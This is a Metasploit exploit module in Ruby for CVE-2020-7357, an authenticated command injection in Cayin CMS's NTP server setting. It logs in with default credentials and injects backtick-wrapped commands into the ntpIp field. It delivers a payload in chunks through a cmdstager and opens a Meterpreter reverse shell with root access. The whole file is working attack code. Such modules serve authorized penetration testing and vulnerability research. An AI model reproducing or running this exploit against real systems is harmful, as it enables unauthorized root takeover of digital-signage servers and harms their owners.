Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11
  include Msf::Exploit::CmdStager
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Cayin CMS NTP Server RCE',
18
        'Description' => %q{
19
          This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed
20
          in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so
21
          repeated requests are made to achieve a larger payload.
22
          Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the
23
          environment should be pretty set and not dynamic between targets.
24
          Results in root level access.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'h00die', # msf module
29
          'Gjoko Krstic (LiquidWorm) <[email protected]>' # original PoC, discovery
30
        ],
31
        'References' => [
32
          [ 'EDB', '48553' ],
33
          [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
34
          [ 'CVE', '2020-7357' ]
35
        ],
36
        'Platform' => ['linux'],
37
        'DefaultOptions' => {
38
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
39
        },
40
        'Privileged' => true,
41
        'Arch' => [ARCH_X86, ARCH_X64],
42
        'Targets' => [
43
          [ 'Automatic Target', {}]
44
        ],
45
        'DisclosureDate' => '2020-06-04',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Stability' => [CRASH_SAFE],
49
          'Reliability' => [REPEATABLE_SESSION],
50
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
51
        }
52
      )
53
    )
54
    register_options(
55
      [
56
        Opt::RPORT(80),
57
        OptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']),
58
        OptString.new('USERNAME', [true, 'Username to login with', 'administrator']),
59
        OptString.new('PASSWORD', [true, 'Username to login with', 'admin']),
60
        # from the original advisory, leaving here just in case
61
        # OptString.new('USERNAME', [true, 'Username to login with', 'webadmin'])
62
        # OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin'])
63
      ]
64
    )
65
  end
66

67
  def check
68
    res = send_request_cgi(
69
      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi')
70
    )
71

72
    if res.nil? || res.code != 200
73
      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
74
    end
75

76
    if res.body.include?('var model = "CMS') && res.body.include?('STR_CAYIN_LOGO')
77
      print_good('Cayin CMS install detected')
78
      return CheckCode::Detected
79
    end
80

81
    CheckCode::Safe
82
  rescue ::Rex::ConnectionError
83
    CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
84
  end
85

86
  def login
87
    res = send_request_cgi(
88
      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
89
      'method' => 'POST',
90
      'vars_post' => {
91
        'apply_mode' => 'login',
92
        'lang' => 'ENG',
93
        'username' => datastore['USERNAME'],
94
        'password' => datastore['PASSWORD']
95
      }
96
    )
97

98
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
99

100
    # instead of a 302 like most apps, this does a script window.location to forward...
101
    unless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi')
102
      fail_with(Failure::BadConfig, "#{peer} - Login failed. Check username and password")
103
    end
104

105
    res.get_cookies
106
  end
107

108
  def execute_command(cmd, _opts = {})
109
    # originally attempted to use the 'test' functionality, however it attempts 3 times which
110
    # means our exploit code stage chunks are written 3 times.
111
    # also attempted to just 'save', however it doesn't execute an update.
112
    # 'update' was the prefered functionality
113
    send_request_cgi(
114
      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'),
115
      'method' => 'POST',
116
      'cookie' => "#{@cookie} sys=Service",
117
      'vars_post' => {
118
        'exe' => 'webSvrUpdateNtp',
119
        'ntpIp' => "`#{cmd}`"
120

121
        # test button, executes 3 times
122
        # 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs
123
        # 'ntpIp' => "`#{cmd}`"
124

125
        # save button, but doesnt execute
126
        # 'save' => 'webSvrNtp',
127
        # 'ntpIp' => "`#{cmd}`",
128
        # 'ntpEnable' => 1,
129
        # 'ntp_server' => 0
130
      }
131
    )
132
  end
133

134
  def exploit
135
    if check != CheckCode::Detected
136
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
137
    end
138

139
    @cookie = login
140
    execute_cmdstager(flavor: :printf, linemax: 200)
141
  rescue ::Rex::ConnectionError
142
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
143
  end
144

145
end
146

147